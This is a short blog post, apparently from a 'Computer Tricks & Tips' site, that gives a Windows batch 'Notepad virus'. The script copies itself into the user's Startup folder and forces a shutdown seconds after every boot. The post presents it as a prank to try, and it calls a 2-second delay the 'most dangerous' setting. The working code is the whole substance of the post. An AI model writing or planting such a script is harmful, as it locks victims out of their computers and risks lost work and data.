Suppose u want to make a shutdown.bat a virus which will copy itself in start up n wenever comptuer starts it will shut down it in 2 secs..most dangerous kind of thing better to make create restore point before working with such files..copy the code in notepad
@echo off
copy "abcd.bat" "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
@echo off
shutdown -s -t 5 -c "Shutdown"
save it as abcd.bat when ever u will run it it will be saved in ur start ups..
here t 5 means that ur comp will take5 secs to shut down u can make it 2 as well then it will be most dangerous thing to handle .. lol
Notepad virus (3)
Labels: Notepad virus (3)
Subscribe to:
Post Comments (Atom)
Copyright © Computer Tricks & Tips. All rights reserved.
Blogger template created by Templates Block in collaboration with Music Videos Online
Provided By Free Website Templates | Freethemes4all.com | SEO Design
0 comments:
Post a Comment